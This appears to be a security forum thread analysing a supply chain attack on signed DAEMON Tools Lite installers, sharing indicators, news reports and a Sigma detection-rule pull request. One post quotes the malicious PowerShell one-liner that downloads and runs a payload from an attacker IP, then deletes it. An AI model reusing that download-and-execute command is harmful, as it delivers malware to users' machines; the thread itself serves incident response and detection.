Hi,
A user downloaded what looks like a legitimate software(digitally signed, old domain name, etc), but the new Windows service spawned Powershell to fetch and run a payload (envcheck.exe) from an IP located in Singapore
4 Likes
VT definitely thinks the second one is gross.
I ran the initial file in tria.ge but never got to the second stage.
But I’d love a sample, if you’re willing to provide it.
Hi,
The installer DTLite1250-2421b.exe was still available this morning. I recall validating the hash.
htxxps://www.daemon-tools[.]cc/downloads#install-dtLite-offer
The service “C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe” spawned Powershell roughly 13 minutes after starting for the first time. A oneliner using DownloadFile.
Right, I have the installer, but not the second file. I’ll run the sandbox for longer.
cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘hxxp://38.180.107.76/env_check_script’,‘C:\Windows\Temp\envchk.exe’)”&&C:\Windows\Temp\envchk.exe hxxp://38.180.107.76/09505aca4f538bd&&del C:\Windows\Temp\envchk.exe
Sadly I don’t have the file, but perhaps you are lucky with the IP.
I tried urlscan.io and it returned 404, but there may be some checks like the use agent.
Hi,
Today they released a report, explaining that the supply chain attack likely originated from China.
There’s widespread infection, but they only were targeting certain countries in Eastern Europe and Asia.
https://x.com/i/status/2051588887244333125
Targeted by threat actors: individuals and organizations across 100+ countries and territories, with the majority of victims located in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China.
1 Like
GitHub PR with Sigma rules
master ← swachchhanda000:daemon-supply-chain
opened 11:25AM - 06 May 26 UTC
### Summary of the Pull Request
Adds three new detection rules covering the D… AEMON Tools Lite supply chain attack
disclosed in May 2026 (Securelist). Attackers trojanized three signed binaries inside
DAEMON Tools Lite installations (versions 12.5.0.2421–12.5.0.2434) to deliver an
information collector, a minimalistic backdoor, and a QUIC-based RAT that injects into
notepad.exe and conhost.exe. The campaign ran from April 8, 2026 and affected users
across more than 100 countries.
Rules cover three key detection opportunities:
- DNS beacon to the typosquatted C2 domain `env-check.daemontools.cc`
- Process creation from compromised binaries identified by known-bad FileVersion ranges
- Stage-drop activity: IP-based C2 callout, envchk.exe download, and mcrypto payload execution via rundll32
### Changelog
new: DAEMON Tools Supply Chain Backdoor DNS Lookup for Typosquatted C2 Domain
new: Compromised DAEMON Tools Binary Execution
new: DAEMON Tools Supply Chain Attack Indicators
### Example Log Event
### Fixed Issues
### SigmaHQ Rule Creation Conventions
- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/)
1 Like
Some additional context/reporting here. v12.6 removes the backdoor, per the maintainer.
The cybersecurity company says it's seen thousands of infection attempts, and at least a dozen successful hacks after users installed malicious versions of the popular Windows software.
Est. reading time: 3 minutes